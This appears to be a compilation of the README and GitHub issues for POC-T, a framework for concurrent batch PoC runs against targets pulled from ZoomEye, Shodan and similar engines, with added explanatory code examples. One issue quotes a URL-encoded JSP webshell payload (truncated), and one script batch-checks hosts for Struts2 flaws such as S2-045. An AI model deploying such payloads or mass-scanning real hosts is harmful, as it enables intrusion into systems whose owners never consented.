A script-invocation framework for penetration-testing tasks that need concurrency, such as collection | crawling | brute-forcing | batch PoC runs.
PoCs and practical scripts are welcome (submit a PR or e-mail [email protected]); information about the PoCs you contribute will be published at the locations below.
- Supports two concurrency modes: multithreading and Gevent
- Minimalist script writing, no need to consult documentation
- Built-in script extensions and common PoC helper functions
- Supports third-party search-engine APIs (ZoomEye/Shodan/Google/Fofa free tier done)
- Python 2.7
- pip
- mail:[email protected]
Plugin-based concurrent penetration-testing framework / Open-sourced remote vulnerability PoC/EXP framework
01 Requirements and Design
Crawler
Example: Bilibili user signature crawler
Command: python POC-T.py -eC -s spider-example -iA 1-200000 -t 50
-eC : use single-threaded asynchronous mode (coroutines)
-iA 1-200000 : generate the consecutive numbers 1 to 200000 as user IDs
-t 50 : set the concurrency to 50
There is no -eC option in the source; asynchronous coroutines are -eG.
Suggest that the -f option accept plain IP format, without the leading "http://" and the trailing "/", because the hosts exported by the APIs of ZoomEye and similar engines are all in IP format. Thanks for sharing.
Shodan API searches are unstable; when limit is greater than 200 it prompts [!] Automatic authorization failed.
Input API-KEY >
[-] Invalid Shodan API key.
After entering the API key there is no response.
The https://www.censys.io/ API could also be added; the results might be more complete.
Also, could HTTPS crawling be supported?
As in the title.
I'd like to ask whether POC-T supports bugscan or beebeeto scripts?
After configuring the fofa API, the command line still prompts for the email and API key; also, the zoomeye API was updated today, and it is compatible with the old API.
Just borrow the SHODAN parameters.
/lib/api/zoomeye/pack.py
def ZoomEyeSearch(query, limit, type='host', offset=0):
    ...
    limit += offset
    for page_n in range(int(offset / 10), (limit + 10 - 1) / 10):
        ...
/lib/controller/api.py
if conf.API_MODE is API_MODE_NAME.ZOOMEYE:
    anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.SHODAN_OFFSET)
    ...
/lib/core/option.py
if conf.API_MODE is API_MODE_NAME.ZOOMEYE:
    if search_type not in ['web', 'host']:
        msg = 'Invalid value in [--search-type], show usage with [-h]'
        sys.exit(logger.error(msg))
    else:
        conf.ZOOMEYE_SEARCH_TYPE = search_type
        conf.SHODAN_OFFSET = offset
...
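The snippet above folds the offset into the limit and then derives a page range from it, which is where the off-by-one and window-trimming mistakes in search-engine pagination usually hide. The following is an added example (not POC-T's own code) that maps a requested result window [offset, offset + limit) onto API pages and trims the fetched rows back to exactly that window; it assumes 10 results per page and 1-based page numbers, and the fetch function is a constructed stand-in for a real API call. Written in Python 3.

```python
# Added example: pagination for a search-engine API (not POC-T's code).
PAGE_SIZE = 10  # assumption: 10 results per API page, as in the snippet above


def pages_for_window(offset, limit, page_size=PAGE_SIZE):
    """Return the 1-based page numbers that cover results [offset, offset + limit)."""
    if offset < 0 or limit <= 0:
        return []
    first = offset // page_size + 1
    last = (offset + limit + page_size - 1) // page_size  # ceiling division
    return list(range(first, last + 1))


def collect_window(fetch_page, offset, limit, page_size=PAGE_SIZE):
    """Fetch every page the window touches, then trim to exactly the window.

    Stops early on an empty or short page so a limit larger than the result
    set does not keep hitting the API (and burning quota) for nothing.
    """
    rows = []
    for page in pages_for_window(offset, limit, page_size):
        batch = fetch_page(page)
        if not batch:                 # nothing left on the server side
            break
        rows.extend(batch)
        if len(batch) < page_size:    # short page means it was the last one
            break
    skip = offset % page_size         # rows before `offset` inside the first page
    return rows[skip:skip + limit]


# Constructed sample data: 37 hosts, so page 4 is short and page 5 is empty.
FAKE_HOSTS = ["10.0.0.%d" % i for i in range(1, 38)]


def fake_fetch_page(page, page_size=PAGE_SIZE):
    """Constructed stand-in for the real API call: 1-based page -> list of hosts."""
    start = (page - 1) * page_size
    return FAKE_HOSTS[start:start + page_size]


if __name__ == "__main__":
    print(pages_for_window(15, 10))                       # [2, 3]
    print(collect_window(fake_fetch_page, 15, 10))        # hosts 16..25
    print(collect_window(fake_fetch_page, 30, 20))        # only 7 hosts exist
```

The trimming step matters whenever the offset is not a multiple of the page size: fetching page 2 for offset 15 returns results 11 to 20, and the first five of them must be discarded.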
cron version is 3.0pl1-128ubuntu2
seems like cron refuses to execute a malformed crontab file (no matter where it is placed)
ZoomEye cannot be verified; entering the account and password always shows failure.
No updates for a long time?
root@kali:/home/fuck/POC-T# python POC-T.py
Traceback (most recent call last):
File "POC-T.py", line 7, in <module>
from lib.cli import main
File "/home/fuck/POC-T/lib/cli.py", line 10, in <module>
from lib.controller.loader import loadModule, loadPayloads
File "/home/fuck/POC-T/lib/controller/loader.py", line 14, in <module>
from lib.controller.api import runApi
File "/home/fuck/POC-T/lib/controller/api.py", line 11, in <module>
from lib.api.shodan.pack import ShodanSearch
File "/home/fuck/POC-T/lib/api/shodan/pack.py", line 9, in <module>
from shodan.exception import APIError
ImportError: No module named exception
root@kali:/home/fuck/POC-T#
[*] Activate Google API
Traceback (most recent call last):
File "/home/tools/expliot/POC-T-2.0/lib/cli.py", line 45, in main
loadPayloads()
File "/home/tools/expliot/POC-T-2.0/lib/controller/loader.py", line 49, in loadPayloads
api_mode()
File "/home/tools/expliot/POC-T-2.0/lib/controller/loader.py", line 88, in api_mode
file = runApi()
File "/home/tools/expliot/POC-T-2.0/lib/controller/api.py", line 27, in runApi
anslist = GoogleSearch(query=dork, limit=limit, offset=conf.API_OFFSET)
File "/home/tools/expliot/POC-T-2.0/lib/api/google/pack.py", line 60, in GoogleSearch
service = build("customsearch", "v1", http=_initHttpClient(), developerKey=key)
File "/usr/local/lib/python2.7/dist-packages/googleapiclient/_helpers.py", line 134, in positional_wrapper
return wrapped(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/googleapiclient/discovery.py", line 225, in build
requested_url, discovery_http, cache_discovery, cache, developerKey
File "/usr/local/lib/python2.7/dist-packages/googleapiclient/discovery.py", line 282, in _retrieve_discovery_doc
resp, content = http.request(actual_url)
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/__init__.py", line 1609, in request
(response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/__init__.py", line 1351, in _request
(response, content) = self._conn_request(conn, request_uri, method, body, headers)
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/__init__.py", line 1272, in _conn_request
conn.connect()
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/__init__.py", line 1059, in connect
raise SSLHandshakeError(e)
SSLHandshakeError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)
[!] It seems like you reached a unhandled exception, please report it to author's mail:[email protected] or raise a issue via:https://github.com/Xyntax/POC-T/issues/new.
Some scans raise exceptions; suggest adding those results to the statistics so they are easier to troubleshoot.
Like this:
0 found | 0 remaining | 5 scanned | 5 failed in 2.61 seconds
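The suggestion above is that a failed check should be counted separately rather than silently dropped, so the operator can tell "nothing found" from "nothing could be tested". The following is an added example (not POC-T's own code) of a small concurrent runner in the spirit of the framework: it runs a script's poc(target) over a target list with a thread pool, keeps the run going when one target raises, records the error per target for triage, and prints a summary line in the same shape as the one quoted above. demo_poc and DEMO_TARGETS are constructed stand-ins. Written in Python 3.

```python
# Added example: concurrent PoC runner that counts failures (not POC-T's code).
import time
from concurrent.futures import ThreadPoolExecutor, as_completed


def run_concurrent(poc, targets, threads=50):
    """Run poc(target) for every target; return counters plus per-target errors.

    'scanned' counts every target that completed (hit, miss or error),
    'failed' the subset whose poc raised, so scanned == found + misses + failed.
    """
    stats = {"found": 0, "scanned": 0, "failed": 0,
             "remaining": len(targets), "errors": {}}
    start = time.time()
    with ThreadPoolExecutor(max_workers=threads) as pool:
        futures = {pool.submit(poc, t): t for t in targets}
        for fut in as_completed(futures):
            target = futures[fut]
            stats["remaining"] -= 1
            stats["scanned"] += 1
            try:
                hit = fut.result()
            except Exception as exc:  # keep going, but keep the evidence
                stats["failed"] += 1
                stats["errors"][target] = "%s: %s" % (type(exc).__name__, exc)
                continue
            if hit:
                stats["found"] += 1
    stats["elapsed"] = time.time() - start
    return stats


def summary_line(stats):
    """Same layout as the line suggested above, with the failed count included."""
    return "%d found | %d remaining | %d scanned | %d failed in %.2f seconds" % (
        stats["found"], stats["remaining"], stats["scanned"],
        stats["failed"], stats["elapsed"])


def demo_poc(target):
    """Constructed stand-in for a script's poc(): 'hit-*' targets are positives,
    'down-*' targets raise the way a refused connection would."""
    if target.startswith("down"):
        raise ConnectionError("constructed: connection refused")
    return target.startswith("hit")


DEMO_TARGETS = ["hit-1", "miss-1", "down-1", "hit-2", "down-2"]  # constructed


if __name__ == "__main__":
    result = run_concurrent(demo_poc, DEMO_TARGETS, threads=3)
    print(summary_line(result))
    for target, err in sorted(result["errors"].items()):
        print("[!] %s -> %s" % (target, err))
```

Keeping the per-target error text alongside the counters is what makes the failed count actionable: a run that reports "5 failed" because every target timed out points at the network or the API key, not at the PoC.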
Test environment: CentOS 6.5, Python 2.6.6; running
-T -m test --api --dork "jboss country:vn" --max-page 10
gives: ValueError: zero length field name in format
As in the title.
ZoomEye has been redesigned; it seems data can no longer be retrieved.
The confluence-traversal directory traversal requires a login; the script does not supply a cookie or other such information.
Hello, I am a university student majoring in information security and a loyal POC-T user; this script framework has helped my studies a great deal. Recently I ran into some problems using the zoomeye API, and my Python skills are not good enough to solve them myself. Could you give me some advice?
The problem is as follows:
The command is
python2 POC-T.py -eT -t 50 -s struts2-s2045 -aZ "login.action" --limit 3000
Traceback (most recent call last):
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\cli.py", line 45, in main
loadPayloads()
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\controller\loader.py", line 49, in loadPayloads
api_mode()
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\controller\loader.py", line 88, in api_mode
file = runApi()
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\controller\api.py", line 23, in runApi
anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.API_OFFSET)
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\api\zoomeye\pack.py", line 29, in ZoomEyeSearch
data = z.dork_search(query, resource=type, page=page_n)
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\api\zoomeye\base.py", line 83, in dork_search
resp = requests.get(zoomeye_api, params=params, headers=headers)
File "G:\python2\lib\site-packages\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "G:\python2\lib\site-packages\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "G:\python2\lib\site-packages\requests\sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "G:\python2\lib\site-packages\requests\sessions.py", line 646, in send
r = adapter.send(request, **kwargs)
File "G:\python2\lib\site-packages\requests\adapters.py", line 498, in send
raise ConnectionError(err, request=request)
ConnectionError: ('Connection aborted.', error(10060, ''))
[!] It seems like you reached a unhandled exception, please report it to author's mail:[email protected] or raise a issue via:https://github.com/Xyntax/POC-T/issues/new;
I noticed you haven't updated POC-T for a long time; could you update it a bit?
I have already contacted you by e-mail and sent the details, along with the latest PoC I want to contribute.
When will a Python 3.x version be released?
#!/usr/bin/env python
#coding:utf-8
# One-shot Struts2 vulnerability detection tool
# Currently only performs detection
from script.s2045 import s2_045
from script.s2devmode import s2_devmode
from script.s2032 import s2_032
from script.s2016 import s2_016
import sys

def begin(url):
    # default to http:// when no scheme was given
    if '://' not in url:
        url = 'http://' + url
    found = False
    # check for s2-016
    if s2_016(url):
        print "[]存在s2_016漏洞" + url
        found = True
    if s2_032(url):
        print "[]存在s2_032漏洞" + url
        found = True
    if s2_devmode(url):
        print "[]存在s2_devmode漏洞" + url
        found = True
    if s2_045(url):
        print "[]存在s2_045漏洞" + url
        found = True
    return found

# the framework passes each target in as `url`; return the result so hits are counted
def poc(url):
    return begin(url)
Hello, the wiki at https://github.com/Xyntax/POC-T/wiki/03-编写脚本 says that full paths are supported;
after testing they are not, the script path is hard-coded. Suggest changing it.
https://api.zoomeye.org/resources-info
The host-search
and web-search fields this endpoint originally returned
have been merged into search.
The way the current code reads them is problematic and causes an abnormal exit.
Traceback (most recent call last):
File "/home/qiyuan/POC-T/lib/cli.py", line 45, in main
loadPayloads()
File "/home/qiyuan/POC-T/lib/controller/loader.py", line 49, in loadPayloads
api_mode()
File "/home/qiyuan/POC-T/lib/controller/loader.py", line 88, in api_mode
file = runApi()
File "/home/qiyuan/POC-T/lib/controller/api.py", line 23, in runApi
anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.API_OFFSET)
File "/home/qiyuan/POC-T/lib/api/zoomeye/pack.py", line 25, in ZoomEyeSearch
z = _initial()
File "/home/qiyuan/POC-T/lib/api/zoomeye/pack.py", line 16, in _initial
msg = 'Available ZoomEye search: (web:%s,host:%s)' % (info['web-search'], info['host-search'])
KeyError: 'web-search'
In pack.py under path-POC-T/lib/api/zoomeye,
replace line 16 of the file with the following:
msg = 'Available ZoomEye search: (search:%s)' % (info.get('web-search', ''))
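The KeyError above is the classic failure mode of reading a third-party API response with hard-coded keys: the provider renamed a field and the client died before running a single check. The following is an added example (not POC-T's own code, and not a statement of ZoomEye's real response format) that parses the quota counters defensively, accepting either the old separate web-search/host-search counters or the merged search counter, and failing with a readable message instead of a KeyError when neither is present. The two sample responses are constructed, and whether the counters sit at the top level or under a "resources" key is an assumption handled both ways. Written in Python 3.

```python
# Added example: tolerant parsing of a quota/resources-info response (not POC-T's code).
import json

# Constructed sample responses: the old shape with two counters and the new merged one.
OLD_RESOURCES_INFO = json.dumps(
    {"plan": "free", "resources": {"web-search": 123, "host-search": 456}})
NEW_RESOURCES_INFO = json.dumps(
    {"plan": "free", "resources": {"search": 579}})

# Every counter name we know how to display, newest first.
QUOTA_KEYS = ("search", "web-search", "host-search")


def parse_search_quota(body):
    """Return {counter_name: remaining} for whichever counters the response carries.

    Raises ValueError (not KeyError) with the keys actually seen, so a future
    rename shows up as a clear message rather than a crash deep in a search call.
    """
    info = json.loads(body) if isinstance(body, str) else body
    if not isinstance(info, dict):
        raise ValueError("unexpected resources-info payload: %r" % (info,))
    # assumption: counters may be flat or nested under "resources"; accept both
    source = info.get("resources", info)
    quota = {k: source[k] for k in QUOTA_KEYS if k in source}
    if not quota:
        raise ValueError(
            "no search quota counters in resources-info, keys seen: %s"
            % ", ".join(sorted(source)))
    return quota


def format_quota(quota):
    """Render the counters in the same style as the log line discussed above."""
    parts = ["%s:%s" % (k, quota[k]) for k in QUOTA_KEYS if k in quota]
    return "Available ZoomEye search: (%s)" % ", ".join(parts)


if __name__ == "__main__":
    for body in (OLD_RESOURCES_INFO, NEW_RESOURCES_INFO):
        print(format_quota(parse_search_quota(body)))
```

The point of raising ValueError with the observed keys is operational: the framework can log that one line and abort before spending any of the remaining quota, and the operator immediately sees what the API now returns.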
This framework is great; it would be even better with a few more parameter options. For example, add a parameter for opening a dictionary file that the PoC can call directly; then writing PoC scripts for things like CMS fingerprinting and website directory scanning would be more flexible and convenient. Worth considering.
How was this shellcode generated??
jsp = ("%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75" "%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%2c%20%6a%61%76%61%2e%6e" "%65%74%2e%2a%22%20%70%61%67%65%45%6e%63%6f%64%69%6e%67%3d%22%55%54%46" "%2d%38%22%25%3e%3c%70%72%65%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74" "%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%70%70%22%29%20%21%3d" "%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%77%72%69%74%65%70%65" "%72%6d%69%73%73%69%6f%6e%20%3d%20%28%6e%65%77%20%44%61%74%65%28%29%2e" "%74%6f%53%74%72%69%6e%67%28%29%2e%73%70%6c%69%74%28%22%3a%22%29%5b%30" "%5d%2b%22%68%2e%6c%6f%67%22%29%2e%72%65%70%6c%61%63%65%41%6c%6c%28%22" "%20%22%2c%20%22%2d%22%29%3b%20%53%74%72%69%6e%67%20%73%68%5b%5d%20%3d" "%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22" "%70%70%70%22%29%2e%73%70%6c%69%74%28%22%20%22%29%3b%20%63%68%65%63%6b" "%2e%73%65%74%52%65%71%75%65%73%74%50%72%6f%70%65%72%74%79%28%22%55%73" "%65%72%2d%41%67%65%6e%74%22%2c%20%72%65%71%75%65%73%74%2e%67%65%74%48" "%65%61%64%65%72%28%22%48%6f%73%74%22%29%2b%22%3c%2d%22%2b%72%65%71%75" "%65%73%74%2e%67%65%74%52%65%6d%6f%74%65%41%64%64%72%28%29%29%3b%20%69" "%66%20%28%21%6e%65%77%20%46%69%6c%65%28%22%63%68%65%63%6b%5f%22%2b%77" "%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%2e%65%78%69%73%74%73%28" "%29%29%7b%20%50%72%69%6e%74%57%72%69%74%65%72%20%77%72%69%74%65%72%20" "%3d%20%6e%65%77%20%50%72%69%6e%74%57%72%69%74%65%72%28%22%63%68%65%63" "%6b%5f%22%2b%77%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%3b%20%63" "%68%65%63%6b%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20" "%77%72%69%74%65%72%2e%63%6c%6f%73%65%28%29%3b%20%7d%20%65%6c%73%65%20" "%69%66%20%28%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%64%22" "%29%20%7c%7c%20%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%70" "%63%6f%6e%66%69%67%22%29%29%20%63%68%65%63%6b%2e%67%65%74%49%6e%70%75"
After the changes the project no longer reports errors, but it cannot parse the input and keeps throwing File "F:\Tools_ST\005POC_Frame\POC-T\thirdparty\ansistrm\ansistrm.py", line 69, in emit
self.handleError(record
Traceback (most recent call last):
File "POC-T.py", line 7, in <module>
from lib.cli import main
File "/opt/POC-T/POC-T/lib/cli.py", line 10, in <module>
from lib.controller.loader import loadModule, loadPayloads
File "/opt/POC-T/POC-T/lib/controller/loader.py", line 14, in <module>
from lib.controller.api import runApi
File "/opt/POC-T/POC-T/lib/controller/api.py", line 13, in <module>
from lib.api.google.pack import GoogleSearch
File "/opt/POC-T/POC-T/lib/api/google/pack.py", line 7, in <module>
from googleapiclient.discovery import build
ImportError: No module named googleapiclient.discovery